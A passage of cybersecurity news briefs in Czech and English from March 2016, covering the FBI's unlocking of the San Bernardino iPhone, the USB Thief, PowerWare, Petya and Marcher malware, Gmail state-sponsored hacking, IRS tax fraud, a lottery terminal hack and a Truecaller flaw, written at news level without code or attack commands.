Není tak jasné, jestli se dá metoda použít jen na inkriminovaném iPhonu útočníka ze San Bernardina, nebo jestli se s její pomocí dá proniknout i do jiných modelů. Farook ovšem měl starší model 5c, který neobsahuje novější bezpečnostní prvky jako je speciální kryptografický čip Secure Enclava (ten přišel s procesorem A7, který je např. v modelu 5s). Na přístroji běží iOS 9.
Úspěch FBI může znamenat, že neznámá třetí strana zná nějakou chybu v zabezpečení iPhonů, o které Apple neví. A to není pro Apple ani jeho uživatele dobrá zpráva. Firma by proto teď mohla po vládě chtít, aby jí dotyčnou chybu prozradila – ovšem je otázka, jestli by byla úspěšná.
Tip: Apple chystá lepší ochranu iPhonů, aby se do nich úřady nedostaly
Podle agentury Bloomberg by se mohla předání informací dožadovat v rámci procesu tzv. „equities review“, podle kterého americké úřady rozhodují, zda výrobcům hardwaru a softwaru prozradí chyby, na které přijdou. Pravidla mají své výjimky, které úřadům umožňují zjištěné chyby zatajit, pokud splní určité podmínky.
Nahlásit případnou chybu a umožnit ji Applu opravit by přitom FBI mohlo zkomplikovat život. Farookův mobil není jediným, do kterého se vyšetřovatelé chtějí dostat. A v současné době vedou řadu dalších soudních sporů, ve kterých od Applu požadují pomoc s odemčením iPhonů.
FBI odblokovala teroristův iPhone i bez pomoci Applu
29.3.2016 Ochrany
Američtí vyšetřovatelé se dokázali dostat k obsahu telefonu iPhone používaným jedním z pachatelů prosincového útoku v kalifornském San Bernardinu i bez pomoci společnosti Apple, která tento telefon vyrábí. Ministerstvo spravedlnosti vzápětí odvolalo svou žalobu na společnost, kterou se domáhalo, aby Apple pomohl s odblokováním telefonu. Vyplývá to z dokumentů, které ministerstvo poslalo k soudu. Spor byl ostře sledovaný, protože mohl mít širší důsledky pro ochranu osobních údajů.
Ministerstvo požadovalo od Apple, aby Federálnímu úřadu pro vyšetřování (FBI) poskytl program, které umožní odblokovat telefon iPhone 5C, který vlastnil Syed Farook. Ten spolu s manželkou v San Bernardinu postříleli 14 lidí a dalších 22 zranili. Následně v přestřelce s policií zahynuli.
FBI zkoumá možnou komunikaci Farooka a jeho manželky Tashfeen Malikové s teroristickou organizací Islámský stát. Inkriminovaný telefon by prý mohl obsahovat důkazy.
Vláda "se úspěšně dostala k údajům ve Farookově iPhonu, a tak už není pomoc Apple potřebná", praví se v dokumentech zaslaných k soudu.
Společnost Apple se k novému vývoji v případu zatím nevyjádřila. Dříve varovala před vytvářením "zadních vrátek" k obsahu mobilů, zneužitelných zločinci a vládami.
Apple pomoc odmítal
Dříve ministerstvo požádalo o odročení soudního jednání, protože se úřady chystaly vyzkoušet novou metodu, od níž si slibovaly průnik k obsahu telefonu i bez pomoci výrobce. Ministerstvo si nicméně ponechalo prostor pro případnou soudní bitvu s výrobcem. Úřady v této při podporovali pozůstalí po obětech útoku v San Bernardinu.
Apple požadavky úřadů odmítal, protože by mohly vytvořit nebezpečný precedent, ospravedlňující v budoucnu další požadavky úřadů na přístup k osobním údajům dalších občanů z nejrůznějších důvodů. V tomto sporu se za Apple postavili bezpečnostní experti, ochránci práva na soukromí a další přední technologické firmy jako Google, Facebook či Microsoft.
Pomohli Izraelci?
Jak uvedl server BBC, firmou, která FBI s dekódováním pomohla, je pravděpodobně společnost Cellebrite se sídlem v Izraeli. Firma britské stanici potvrdila, že s americkými vyšetřovateli spolupracuje, ale více nesdělila.
Na svých internetových stránkách nicméně Cellebrite prohlašuje, že jeden z jejich nástrojů umí dekódovat a extrahovat data z iPhonu 5C.
USB Thief, the new USB-based data stealing Trojan
29.3.2016 Virus
USB Thief, the new USB-based data-stealing Trojan discovered by ESET that relies on USB devices in order to spread itself and infect also air-gapped systems
Security researchers at ESET have discovered a new insidious data-stealer, dubbed USB Thief (Win32/PSW.Stealer.NAI), that relies on USB devices in order to spread itself.
USB Thief is able to infect air-gapped or isolated systems does not leave any trace of activity on the infected systems.
Malware authors have implemented special techniques mechanisms to protect USB Thief from being detected and analyzed. The authors also implemented an advanced multi-staged encryption process to protect the Trojan.
“The USB Thief is, in many aspects different from the more common malware types that we’re used to seeing flooding the internet,” wrote Tomáš Gardoň, a malware analyst at ESET.
“This one uses only USB devices for propagation, and it does not leave any evidence on the compromised computer. Its creators also employ special mechanisms to protect the malware from being reproduced or copied, which makes it even harder to detect and analyze.
Badusb
The USB Thief Trojan malware can be stored either as a Dynamically Linked Library (DLL) used by the portable applications or as a portable application’s plugin source.
Mobile devices are usually used to store portable version of common applications like Firefox, TrueCrypt, and Notepad++. When victims launch the portable application the USB Thief runs in the background.
“Unfortunately, this is not the case with the USB Thief as it uses an uncommon way to trick a user – it benefits from the fact that USB devices often store portable versions of some common applications like Firefox portable, Notepad++ portable, TrueCrypt portable and so on.” continues the post.
The malware completely resides on the USB device, it doesn’t leave any trace of its presence. According to the experts at the ESET any tool that could be used to breach an air-gapped network must be taken into account.
“Well, taking into account that organizations isolate some of their systems for a good reason,” said Peter Stancik, the security evangelist at ESET. “Any tool capable of attacking these so called air-gapped systems must be regarded as dangerous.” “People should understand the risks associated with USB storage devices obtained from sources that may not be trustworthy.”
How can organizations prevent attacks based on USB Thief from succeeding?
Do not use USB storage devices from sources that may not be trustworthy.
Disable USB ports wherever possible.
Define strict policies to enforce care in the use of USB devices.
Train the staff on cyber threats.
1 million Gmail accounts victim of state-sponsored hacking
28.3.2016 Incindent
Google is improving its Gmail warning service to help protect the customers from state-sponsored hacking and surveillance activities.
Google confirmed that one million Gmail accounts might have been targeted by nation-state hackers.
The news is worrying, the company is observing a significant increase in the number of hacking attacks on user email accounts.
Google announced that it is able to identify operations carried out by state-sponsored hackers and it is its intention to notify potentially affected customers.
Google hasn’t provided details on the number of affected customers, anyway , it confirmed that the list of victims “often” includes “activists, journalists, and policy-makers taking bold stands around the world.”
Google confirmed that only a limited number of customers are targeted by state-sponsored hackers, roughly less than 0.1% of users ever receive a notification from the company that anyway consider critic to inform users on ongoing attacks.
In the past, users received a warning through a pink Warning tab present on top of Gmail urging victims to adopt necessary countermeasures.
Google state-sponsored hacking notifications
Now Google has improved the notification messages using a full-page warning related to state-sponsored hacking.
“Today, we’re launching a new, full-page warning with instructions about how these users can stay safe. They may see these new warnings instead of, or in addition to, the existing ones.”
Google is improving its “safe browsing” security notifications, a mechanism to inform users when they are going to open suspicious links included in receiving emails. The users will receive a full-page notice before opening the link, meanwhile, in the past the same notification was provided before a link was clicked.
“Safe Browsing already protects Gmail users by identifying potentially dangerous links in messages. Starting this week, Gmail users will begin to see warnings if they click these links, further extending this protection to different web browsers and email apps. ” States the security advisory published by Google.
Google is continuing to push email encryption to protect its customers from government surveillance. Google is working with IT Giants, including Comcast, Microsoft, and Yahoo, to propose a new secure email mechanism.
In the last weeks, Google implemented a mechanism to warn Gmail users when they send and receive email over unsecured connections.
“This has had an immediate, positive effect on Gmail security. In the 44 days since we introduced it, the amount of inbound mail sent over an encrypted connection increased by 25%. We’re very encouraged by this progress! ” states Google.
“Given the relative ease of implementing encryption and its significant benefits for users, we expect to see this progress continue.”
Watch out, IRS Tax Fraud activities on the rise
28.3.2016 Safety
Security experts and government agencies confirm that IRS Tax Fraud And Phishing campaigns are increasing thanks to new techniques and tools.
Internal Revenue Service tax fraud has reached a peak in the last year, crooks are intensifying their activity adopting new techniques to monetize their efforts.
According to security experts that are monitoring the phenomena, Tax-related phishing activities are increasing in this period.
This is a critical period in the US, the so-called Tax season, that will end on April 18th. In February, an IRS bulletin confirmed that there is a 400 percent surge in tax-related phishing and malware incidents.
“Tax-related phishing is something of an annual phenomenon, but Proofpoint researchers are seeing a degree of sophistication and pervasiveness that sets this year apart,” states a report published by the Proofpoint firm that analyzes tax fraud trends.
Crooks are trying to exploit new habits of taxpayers, for exampletheit preference for mobile platforms. Security experts observed a mobile-optimized phishing site that appears as a legitimate tax application and that targets mobile users.Proofpoint confirmed to have discovered a number of phishing sites hosted on major providers which were shut down by the ISPs after their discovery.Tax-related frauds are considering an emergency for law enforcement, hundreds of thousands of users are potentially at risk.
Recently, IRS services were abused by cyber criminals to target taxpayers, in May 2015 the Internal Revenue Service suffered a data breach. Hackers “used an online service provided by the agency” to access data for more than 100,000 taxpayers. The IRS issued an official statement on the incident and specified that the compromised system was “Get Transcript.” The Transcript service could be used by taxpayers to get a transcript online or by mail to view their tax account transactions.
In August 2015, the Internal Revenue Service disclosed a new review of its system, revealing that 334,000 taxpayers (more than three times it initially estimated) may be affected by the hack it announced in May.
In February the IRS detected roughly unauthorized attempts using 464,000 unique SSNs, and 101,000 attempts allowed crooks in generating PINs.
The U.S. Internal Revenue Service confirmed that cyber criminals abused the Electronic Filing PIN application running on irs.gov that allows taxpayers to generate a PIN that they can use to file tax returns online.
Last figures available on the ‘Get Transcript’ hack revealed that 700,000 taxpayers were affected by the data breach, the government experts observed 47 million tax transcripts requested under false pretenses, a worrying phenomenon.
This year, security firms and government agencies are observing some new worrying attacks targeting businesses with W-2 phishing campaigns. W-2 information could be used by fraudsters to file victim’s taxes and request refunds in their name.
The crooks are also trying to monetize tax-related voice-phishing in order to obtain information to use in the fraudulent activities.
The experts are observing an increased interest in criminal ecosystem for stolen information that could be exploited in tax refund fraud. This precious commodity is becoming popular also in the principal black markets in the dark web.
Attackers are using this information to abuse of the IRS’ electronic filing PIN verification system and file a fake return under on the victim’s behalf and requesting the payment through a fraudulent bank account. The FBI confirmed a significant increase of the Stolen Identity Refund Fraud (SIRF), victims of this kind of crimes are specific categories of individuals like homeless and prisoners.
“SIRF is relatively easy to commit and extremely lucrative for criminal actors. While all U.S. taxpayers are susceptible to SIRF, over the past year, criminal actors have targeted specific portions of the population, including: temporary visa holders, the homeless, prisoners, the deceased, low-income individuals, children, senior citizens, and military personnel deployed overseas.” states the FBI.
Another worrying trend observed by ProofPoint is the availability of tax phishing kits that have reached a high level of quality.
These kits are available for sale in the principal black market places and implements a number of features that allows crooks to avoid detection.
“Sophisticated phishing kits custom-made for tax season dramatically boost threat actors across the spectrum to go after the taxpayers. Whether optimized for mobile (in the case of the fake tax preparation software) or “hiding in plain sight,” these kits are powerful tools for cyber criminals. We even observed a kit correctly using SSL, leveraging the secure form-delivery capabilities of the particular service provider they used. Correctly signed certificates make the phishing sites harder to detect for end users, web browsers, and security providers, giving attackers a leg up during tax season—even with commodity kits.” states ProofPoint.
Taxpayers have to be careful, cyber criminals will do every thing to steal their money.
6 Charged for Hacking Lottery Terminals to Produce More Winning Tickets
28.3.2016 Hacking
Police have arrested and charged six people with crimes linked to hacking Connecticut state lottery terminals in order to produce more winning tickets than usual.
Prosecutors say all the six suspects are either owners or employees of retail stores that produced a much higher number of winning tickets than the state average, according to the Hartford Courant.
Suspects Hacked Lottery Terminal
The alleged group set up machines to process a flood of tickets at once that caused a temporary display freeze, allowing operators to see which of the tickets about to be dispensed would be winning tickets, cancel the duff ones, and print the good ones.
The hack appears to have exploited some software weaknesses in lottery terminals that not only caused ticket requests to be delayed but also allowed operators to know ahead of time whether a given request would produce a winning ticket.
The actual culprit, in this case, was a game dubbed "5 Card Cash."
The alleged suspects manipulated automated ticket dispensers to run off 5 Card Cash game that consists of tickets a user can buy, on which playing cards are printed.
If 5 cards form a winning poker hand, then the buyer can cash the tickets based on the hand they received.
Authorities Suspended 5 Card .Cash Lottery Game
Authorities had already suspended the 5 Card Cash lottery game in Connecticut past November after discovering that the game was generating more winning tickets than its winning range parameters should have technically permitted.
The six suspects are:
Vikas Patel, 32, from Windsor
Pranav Patel, 32, from Bloomfield
Sedat Kurutan from Naugatuck
Moinuddin Saiyed from Norwalk
Prakuni Patel from Wallingford
Rahul Gandhi from Wallingford
Pranav Patel and Vikas Patel were arrested on Friday, March 19 while the rests took into custody between February 29 and March 7.
The charges filed against Vikas and Pranav include first-degree felony counts of larceny and computer crime as well as felony rigging a game charges. Both of them have been bailed on $25,000 bonds each and are scheduled to appear in court on Monday.
Investigators for the Department of Consumer Protection and the Connecticut Lottery say that many clerks were abusing lottery tickets to fetch out more winning tickets that they would later cash in for themselves, and that more arrests may be made in the future.
PowerWare ransomware, a new fileless threat in the wild
28.3.2016 Virus
Experts at Carbon Black spotted in the wild a new threat dubbed PowerWare ransomware that exploits PowerShell, the native Windows framework.
Authors of ransomware are implementing new features to make their malware even more dangerous and effective. Yesterday I wrote about the new Petya ransomware, which overwrites MBR causing a blue screen of death, now I will introduce you a threat targeting the healthcare industry.
The new ransomware is called PowerWare and was discovered a week ago by security researchers at the Carbon Black firm.
The most interesting feature implemented in the PowerWare ransomware is that it is fileless. Many malware in the wild are fileless, including one of the variants of the popular Angler Exploit Kit, but this feature is rare for ransomware.
Criminal gangs behind PowerWare are spreading it using spam messages including a Word document attachment purporting to be an invoice. The attackers use an old trick in order to convince victims in enabling the macros, they request to enable macros to correctly view the document.
The macros runs the cmd.exe which launches the PowerShell, the native Windows framework that uses a command-line shell to perform several tasks.
The use of PowerShell allows the ransomware to avoid writing files to the disk and make hard the threat detection. It also allows the ransomware to encrypt files on the victim’s PC.
“The macros are there to launch PowerShell and pull down the ransomware script. Lots of malware can be distributed via macros in Word docs. Most of the time they download additional binaries to do more bad stuff (backdoors, etc.),” Valdez said.
“This does not pull down any additional binaries (executables), and leverages PowerShell (already on the system and approved to be there) to do the dirty work.”
“This means no ‘traditional’ malware – no additional executable needed – just a text document (script).”
The PowerShell ransomware requests victims to pay a $500 ransom to restored the encrypted files. Also in this case, the ransom double if the victim’s doesn’t respect the deadline.
Fileless ransomware could become rapidly popular in the criminal ecosystem, on March 11, the researchers at Palo Alto Networks, spotted a new malware family called PowerSniff that has many similarities with PowerWare, including the fileless capability.
Nuclear Plants in Germany Are Vulnerable to Terrorism Threats
28.3.2016 Vulnerebility
According to a recent report, Germany nuclear plants are vulnerable to terrorists and there needs to be some serious dealing with this problem.
According to a recently released report, Germany is not adequately equipped to prevent terrorist attacks in its nuclear plants.
According to the Deutsche Presse-Agentur (DPA) news agency, the report was presented by Oda Becker, an independent expert on nuclear plants.
This is of course extremely distressing, especially in the light of the recent tragic events in Belgium with substantial casualties. The report was brought to public attention
The report was brought to public attention at the German Federation for the Environment and Nature Conservation (BUND) Congress, where concerns were expressed towards protecting citizens from catastrophic consequences of another terrorist attack.
When an aircraft is about to collide, there is little that can be done from the defensive line of the nuclear plants to prevent the inevitable.
The same level of threat is expressed through the option of helicopters filled with explosives. There is nothing to prevent such acts, causing a massive destruction and severe radiation flowing everywhere.
Terrorism is one of the major threats to the industry of nuclear plants, making these facilities one of the most prestigious targets to focus on.
“A serious accident is possible in case of every German nuclear plant,” Becker explained in a separate study published on March 8 and titled “Nuclear power 2016 – secure, clean, everything under control?”
Becker considers insufficient security standards, natural disasters, terrorist attacks and emergencies caused by the deterioration of the German nuclear plants’ security systems as major threats to the industry.
“there are no appropriate accident management plans.” she added Becker. “The interim [nuclear waste] storages lack protection against aircraft crashes and dangers posed by terrorists,” Becker said,
The media in Belgium concentrate on the initial thoughts of the terrorists to hit the nuclear plants. If it weren’t for the arrest in Paris, these thoughts would have been made reality and the casualties would have been even greater. Dernier Heure, a newspaper from Belgium, revealed that the terrorists had planted a camera in front of the house of the director of the Belgian nuclear research program. In this way, they had gained a lot of information.
All these events have made a lot of people skeptical as to the importance of shutting down nuclear plants. The head of BUND, Hubert Weiger, has said:
“It is even more necessary than ever to abandon this technology,” and this thought reflects the opinions of thousands in Germany, Belgium and Europe altogether.
AP has reported that IS (or ISIS) has been training hundreds of people especially for external attacks and this would be a threat beyond any control. About 450 people are specials in creating bombs, deteriorating the situation for Europe.
If people in Germany and Belgium do not take immediate actions, who knows what can happen next?
Podnikoví špióni útočí: Mohou to být uklízečka nebo poslíček s poštou
28.3.2016 Špionáž
Je mnohem snadnější proniknout do společnosti jako zaměstnanec nižší úrovně, například jako správce domu či pracovník podatelny, kde jsou nároky mnohem menší – a špión přitom stejně dostává příslovečné klíče ke království.
Někteří informační špióni procházejí náborem zaměstnanců, aby se dostali do firmy a ukradli podniková tajemství pro konkurenci nebo cizí stát. Jiní se zase obrátí proti svému zaměstnavateli, když se rozzlobí a odcházejí nebo když je zlákají jiné pracovní nabídky. Jde takové insidery včas odhalit?
Podniky se snaží vnitřní zrádce odhalit – omezit jejich přístup k citlivým údajům ale nemusí stačit. Se správnou pracovní pozicí a přístupem mohou agenti fiktivně vystupující jako uklízeči, zaměstnanci podatelny nebo IT personál obejít ochrany dat pomocí svého rozsáhlého přístupu a cenný intelektuální majetek vynést pryč.
Co mohou manažeři bezpečnosti udělat technicky i jinak k ochraně bezpečnosti cenných dat před slídily?
Vstup
Podnikoví špióni přicházející z jiných organizací zpravidla dobře splňují podmínky pro příslušné pracovní místo, ale jejich úmysly zůstávají skryté. Úplně zabránit riziku, že by někdo pracoval pro konkurenci, může být obtížné až nemožné, možná dokonce i nežádoucí, protože existuje zájem zaměstnávat personál se zkušenostmi od konkurence.
„Zaměstnanci konkurence mají schopnosti, tržní inteligenci a zkušenosti, které podnik potřebuje, takže jsou to vlastně kandidáti první volby,“ tvrdí Sol Cates, šéf zabezpečení ve společnosti Vormetric.
Konkurenti také podplácejí dříve loajální zaměstnance, aby jejich prostřednictvím získávali vaše data a přetahují je na svou stranu, aby tak získali tržní výhody.
Mnoho podniků se snaží dělat jednoduché kontroly pracovní minulosti a referencí, ale nevěnují se dostatečně odhalování případných postranních úmyslů.
„Dokonce i někteří smluvní partneři státních organizací, kteří běžně pracují s utajovanými informacemi, se spoléhají výhradně na kontrolu minulosti prostřednictvím bezpečnostní prověrky a nedělají další kontroly,“ tvrdí Philip Becnel, ředitel společnosti Dinolt, Becnel, & Wells Investigative Group.
Tato úroveň šetření ale nestačí, protože podnikoví špióni, kteří jsou loajální ke své zemi či původnímu zaměstnavateli, ne k tomu současnému, budou sdílet utajovaná data s dalšími subjekty.
Podniky mohou udělat právní kontroly minulosti uchazeče, aby ověřily, zda předchozí zaměstnavatel například nežaloval kandidáta kvůli krádeži podnikových dat a duševního vlastnictví.
„To však pomůže jen v případě, že se uchazeč už dříve dopustil podnikové špionáže a bývalý zaměstnavatel ho při ní chytil,“ vysvětluje Cates.
Jakmile podnik přijme kandidáta, měl by použít technologie řízení přístupu na fyzické i IT úrovni, skartování dokumentů a zavést dohled, který by odhalil podnikové špióny a zabezpečil se vůči nim. V této oblasti stále existuje řada nedostatků.
Pronikání k podnikovým pokladům
Agenti podnikové špionáže projdou skulinami mezi typickými součástmi většiny kontrol minulosti. Podnik zkontroluje historii zaměstnání, výpis z rejstříku trestů a záznamy o dopravních přestupcích.
To všechno se však týká toho, co kandidát už kdysi udělal, ale ne toho, co chce udělat teď. „Není to jako test na detektoru lži nebo jiná metrika, kterou by společnost mohla použít při kontrole osob kandidujících na citlivá vládní pracovní místa,“ popisuje Cates.
Pachatelé podnikové špionáže se mohou dostat blízko k datům i přes nejméně sledovaná, ale pro špionáž stále výhodná pracovní místa. „Je mnohem snadnější proniknout do společnosti jako zaměstnanec nižší úrovně, například jako správce domu či pracovník podatelny, kde jsou nároky mnohem menší a špión stále dostává příslovečné klíče ke království,“ vysvětluje Becnel.
Naverbovat někoho již pracujícího v cílové společnosti je ještě snadnější, než protlačit špióna přes proces přijímání nových pracovníků. „Pro podnik je také velmi těžké chytit někoho, kdo už je uvnitř a má už určitou důvěru,“ tvrdí Becnel.
„Je časté, že konkurenti kontaktují nespokojené zaměstnance, nabídnou jim práci za lepší plat a požádají je, aby s sebou při odchodu vzali všechna citlivá data,“ tvrdí Becnel. Ti mohou přistupovat k elektronickým datům nebo jen nahrávat pomocí chytrého telefonu interní schůzky a telefonní hovory.
Při náboru existujících zaměstnanců je často největší výhrou IT profesionál, jenž má plný přístup ke všem datům a kterého společnost nesleduje. „Některé z největších špionážních akcí vykonal personál IT,“ tvrdí Cates.
Nepustit dovnitř…
Hluboké a důkladné kontroly pracovní minulosti jsou dobrým začátkem v zabezpečení firem vůči nežádoucímu přijetí agenta, který pracuje pro konkurenci nebo cizí stát, a to i v případě nižších pracovních pozic.
Remotely Exploitable Flaw in Truecaller Leaves 100 Million Android Devices Vulnerable
27.3.2016 Vulnerebility
Security researchers from the Cheetah Mobile Security Research Lab discovered a severe flaw in the call management application Truecaller.
Recently, security researchers from the Cheetah Mobile Security Research Lab discovered a severe loophole in the popular phone call management application Truecaller.
This vulnerability allows anyone to steal Truecaller users’ sensitive information, potentially opening doors for attackers. Overall, more than 100 Million Android users who have downloaded this app on their smartphones are in danger.
The researcher found that Truecaller uses the devices’ IMEI as the only identity label of its users. Meaning that anyone gaining the IMEI of a device will be able to get Truecaller users’ personal information (including phone number, home address, mail box, gender, etc.) and tamper app settings without users’ consent, exposing them to malicious phishers.
By exploiting this flaw, the attackers can:
Steal personal information like account name, gender, e-mail, profile pic, home address, etc.
Modify a user’s application settings:
Disable spam blockers
Add to a black list for users
Delete a user’s blacklist
The Cheetah Mobile Security Research Team notified the developer of Truecaller about this vulnerability as soon as they discovered the loophole and offered all it could to help the developer fix the issue. Now the maker of Truecaller has addressed the issue and released an update on March 22nd.
Although the flaw has been fixed in the latest version, the majority of the users are still in danger as they have not got access to the new release yet. The CM Security Research Lab advises Truecaller users to upgrade this app to the latest version as soon as possible.
Written by Cheetah Mobile Security Research Lab
PETYA ransomware overwrites MBR causing a blue screen of death
27.3.2016 Virus
The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR and leaves a ransom note at system startup.
Ransomware is one of the most dangerous threats of this first part of the year, recently experts at TrendMicro has spotted a new malicious code dubbed Petya (RANSOM_PETYA.A) that overwrites MBR to lock users out of the infected machines.
The Petya ransomware causes a blue screen of death (BSoD) by overwriting the MBR and leaves a ransom note at system startup.
Petya overwrites the MBR of the hard drive causing Windows to crash. When the victim tries to reboot the PC, it will impossible to load the OS, even in Safe Mode.
Users turning on the computer are displayed a flashing red and white screen with a skull-and-crossbones instead.
“As if encrypting files and holding them hostage is not enough, cybercriminals who create and spread crypto-ransomware are now resorting to causing blue screen of death (BSoD) and putting their ransom notes at system startup—as in, even before the operating system loads.” states the post published by Trend Micro.
“Imagine turning on your computer and instead of the usual Windows icon loading, you get a flashing red and white screen with a skull-and-crossbones instead.”
Another interesting aspect of the Petya is the delivery mechanism used by crooks that relies on legitimate cloud storage services like Dropbox.
“this is the first time (in a long time) that leads to crypto-ransomware infection. It is also a departure from the typical infection chain, wherein the malicious files are attached to emails or hosted in malicious sites and delivered by exploit kits.” continues the post.
Victims would receive an email that appears to be from an applicant seeking a position in a company, it includes a link to a Dropbox folder that contains its alleged CV.
The experts explained that one of the samples they analyzed, the Dropbox folder was containing contains two files, a self-extracting executable file that purports to be the CV, and a photo of the applicant.
The researcher discovered that the photo is a stock image.
The self-extracting executable is used to serve a Trojan onto the victim’s machine, the malware first disable any antivirus programs installed, then downloads and executes the Petya Ransomware.
In the following image are reported the instructions provided by the Petya ransomware to the victims in order to pay the ransom and restore the encrypted files.
The instruction includes a link to the Tor Project and how to download the Tor Browser to visit a page where purchase the decryption key to restore the data.
The crooks behind the Petya ransomware request the payment of 0.99 Bitcoins (nearly US$430), but the price would be doubled if the payment is not completed within a deadline.
VNC Roulette, a web roulette for random easy to hack PCs
27.3.2016 Hacking
The VNC Roulette service is exposing on the Internet thousands of computer systems using insecure and easy to hack VNC connections.
CCTV surveillance cameras, medical equipment, electricity generators, desktops, home alarm equipment and many other systems are not properly protected and open on the Internet.
Now a website named VNC Roulette is offering a ransom access to these computer systems through the VNC software.
VNC is a very popular application that allows remote access and control of desktops over the networks. A lot of people simply use it to remotely access their computer placed elsewhere. Crucially, though, these connections should be secured with passwords and encryption.
The problem is that many VNC connections are not secured with passwords and encryption, allowing the access of criminals and hackers.
The newborn VNC Roulette website is taking screenshots insecure VNC connections, it has already gathered imaged from about 550 systems open on the Internet. It is disconcerting to see people’s privacy violated is no simple way, VNC Roulette reveals users browsing Facebook, accessing personal email accounts, or accessing a SCADA system.
The snaps were taken since 2015, some of them were taken this month and are still up and running.
After the media have covered VNC Roulette, it went off line, but yesterday the service reappeared online.
Below some samples shared online by El Reg.
An X-ray machine in in Nevada, US:
A store’s CCTV system in China:
VNC Roulette demonstrates the importance to properly secure any connection to a system exposed over the Internet. It is very easy for hackers to gain access to systems like the ones captured by the VNC Roulette services.
Don’t waste time, implement a proper authentication to your systems, use strong passwords, only accept connections from certain IP addresses and of course tunnel VNC connections with SSH.
Don’t forget also that crooks have many other ways to locate vulnerable machine over the internet, like the search engines Shodan and Censys.
Nebezpečný trojský kůň číhá na lechtivých webech. Chce ukrást úspory
27.3.2016 Viry
Chytré telefony a počítačové tablety se těší rok od roku větší popularitě, řada uživatelů je používá nejen k přístupu na internet, ale také ke sledování filmů a dalších videí. A právě toho se snaží zneužít počítačoví piráti, kteří za aktualizaci populárního přehrávače Flash Player maskují trojského koně.
Trojský kůň Marcher dokáže majitele chytrých telefonů a počítačových tabletů připravit o peníze. (Ilustrační foto)
Nezvaný návštěvník se jmenuje Marcher a zpravidla se ukrývá na webech s erotickým obsahem. Útok přitom probíhá prakticky vždy stejně. Ve chvíli, kdy se uživatel pokusí spustit video, je vyzván k aktualizaci Flash Playeru, místo ní si přitom do svého přístroje stáhne trojského koně.
Právě na pornostránkách se ukrývá Marcher nejčastěji. Stejným způsobem ale může být šířen také prostřednictvím webů pro sledování virálních videí a pro šíření nelegálních kopií nejrůznějších filmů a seriálů.
Odkazy na falešné weby jsou přitom často šířeny prostřednictvím nevyžádaných e-mailů, stejně tak ale mohou přijít na smartphone pomocí SMS zprávy.
Cílí na Android
Bezpečnostní experti ze společnosti Zscaler doposud zachytili tohoto trojského koně na zařízeních s operačním systémem Android. Není ale vyloučeno, že se bude vyskytovat také na počítačových tabletech a chytrých telefonech postavených na jiných platformách.
Uživatelé si přitom ani nevšimnou, že bylo jejich zařízení infikované, protože trojský kůň vlastně na první pohled nic nedělá a jen vyčkává na svou příležitost. Pokud se uživatel bude prostřednictvím oficiální aplikace Google Play snažit stáhnout nějakou aplikaci, vyskočí mu falešné okno se žádostí o vložení platební karty.
Problém je v tom, že Macher se takto dokáže navázat i na skutečně legitimní aplikace, které žádný škodlivý kód neobsahují. Stačí mu k tomu, aby vytvořil podvodnou stránku s žádostí o vložení údajů platební karty. Když to uživatelé udělají, dají tím podvodníkům přímou vstupenku ke svému bankovnímu účtu.
Obejde i potvrzovací SMS zprávy
Není bez zajímavosti, že tento zákeřný trojský kůň dokáže uživatele sám vyzvat k tomu, aby nějakou aplikaci nainstaloval. Odkaz na stažení může přijít například formou MMS zprávy, tu přitom vytvoří sám Macher. Doporučení na instalaci může být směřováno opět na legitimní program, nezvaný návštěvník se opět snaží pouze vylákat bezpečnostní údaje ke kartě.
Pokud se Macher uhnízdí v chytrém telefonu, dokáže odchytávat i potvrzovací SMS zprávy, které mohou být požadovány při některých on-line transakcích.
První verze trojského koně Macher byla odhalena už v roce 2013. Od té doby jej ale počítačoví piráti neustále vylepšovali až do aktuální podoby, která terorizuje uživatele chytrých telefonů a počítačových tabletů s operačním systémem Android.
Malware USB Thief, nezanechá stopy a nepotřebuje internet
27.3.2016 Viry
Malware USB Thief, nezanechá stopy a nepotřebuje internetVčera, Milan Šurkala, aktualitaSpolečnost ESET objevila nový malware, který dokáže krást data a přitom se nešíří internetem. Je totiž instalován na USB flash disku a pro počítač je v podstatě nezjistitelný. Využívá portable verzí různých aplikací.
Na světě se objevil nový nepříjemný malware pod názvem USB Thief (přesněji Win32/PSW.Stealer.NAI a Win32/TrojanDropper.Agent.RFT), který byl identifikován společností ESET. Ten totiž dokáže napadnout i počítače, které nejsou připojené k internetu, neboť ke své práci potřebuje pouze USB flash disk. Sám o sobě se nešíří, na USB disk se záměrně "instaluje" a jeho úkolem je stáhnout data z konkrétního cíleného počítače. Na rozdíl od běžných malwarů nevyužívá technik automatického spuštění, ale naroubuje se jako dynamická knihovna do portable verzí různých aplikací jako je Notepad++, Firefox nebo TrueCrypt. Pokud se z této USB flashky spustí onen program, spustí se také USB Thief.
Nebezpečnost spočívá v pokročilých technikách maskování. Některé soubory jsou zašifrovány pomocí AES-128 a klíč vzniká z kombinace některých vlastností USB flashky (jejího ID a dalších). Proto je tento klíč unikátní pro každý USB disk. Další soubory mají jména podle SHA512 hashe z prvních několika bytů daného souboru, opět tedy unikátní pro každou kopii malwaru.
Malware ví, pod kterým procesem má běžet a pokud toto neodpovídá (např. běží v debuggeru), ukončí se. Proto je těžké jej detekovat antivirovými programy a známé antiviry také detekuje. Pokud tedy vše projde, na základě konfiguračních souborů stáhne požadovaná data a uloží je na USB disk. Na počítači samotném ale malware nezanechává žádné stopy, neboť běží z flashky. Má-li tedy někdo nekalé cíle a někomu takto úmyslně podstrčí infikovaný USB flash disk, může se dostat k citlivým datům (pochopitelně útočník musí dostat disk zase zpátky). Je tedy důležité dávat si pozor, jaké USB disky člověk používá a jaký je jejich zdroj.
Facebook's latest feature Alerts You if Someone Impersonates Your Profile
26.3.2016 Social Site
Online harassment has been elevated a step with the advent of popular social networks like Facebook.
Cyber stalkers create fake profiles impersonating other Facebook users and start doing activities on their behalf until and unless the owners notice the fake profiles and manually report it to Facebook.
Even in some cases, cyber stalkers block the Facebook account holders whom they impersonate in order to carry out mischievous tasks through fake profiles without being detected by the actual account holders.
But now, online criminals can no longer fool anyone with impersonation method, as Facebook is currently working on a feature that automatically informs its 1.6 Billion user base about the cloned accounts.
If the company detects a duplicate Facebook account of a user, it will automatically send an alert to the original account holder, who'll be prompted to identify if the profile in question is indeed a fake profile impersonating you or if it actually belongs to someone else.
How would Facebook identify the Clone Profiles?
The new feature would reportedly inform Facebook users about their cloned accounts when it finds a perfect match of both profile pictures and profile names.
However, it seems like Facebook would use its one of the world's best face recognition technologies to identify users' fake profiles.
While uploading a group pic of you with your friends, you might have noticed how Facebook automatically detects your friend's face and suggests the correct names without manually feeding into it.
